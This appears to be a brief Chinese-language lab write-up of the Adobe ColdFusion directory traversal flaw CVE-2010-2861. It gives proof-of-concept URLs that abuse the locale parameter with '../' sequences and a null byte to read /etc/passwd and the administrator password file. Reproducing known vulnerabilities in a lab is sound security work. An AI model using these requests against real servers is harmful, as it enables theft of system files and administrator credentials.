Adobe ColdFusion目录遍历漏洞(CVE-2010-2861)
Adobe ColdFusion是由JJ Allaire于1995年创建的商业快速Web应用程序开发计算平台。
Adobe ColdFusion 9.0.1和更早版本中存在一个目录遍历漏洞,该漏洞使远程攻击者可以通过以下区域设置参数来读取任意文件:(1)CFIDE / administrator / settings / mappings.cfm,(2)logging / settings.cfm ,(3)datasources / index.cfm,(4)j2eepackaging / editarchive.cfm和(5)CFIDE / administrator /中的enter.cfm。
访问http://192.168.44.132:8500/CFIDE/administrator/enter.cfm
以查看初始化页面,输入密码admin
以初始化整个服务器。
POC
/etc/passwd
通过读取文件http://192.168.44.132:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en
:
通过http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
以下方式读取后台管理员密码: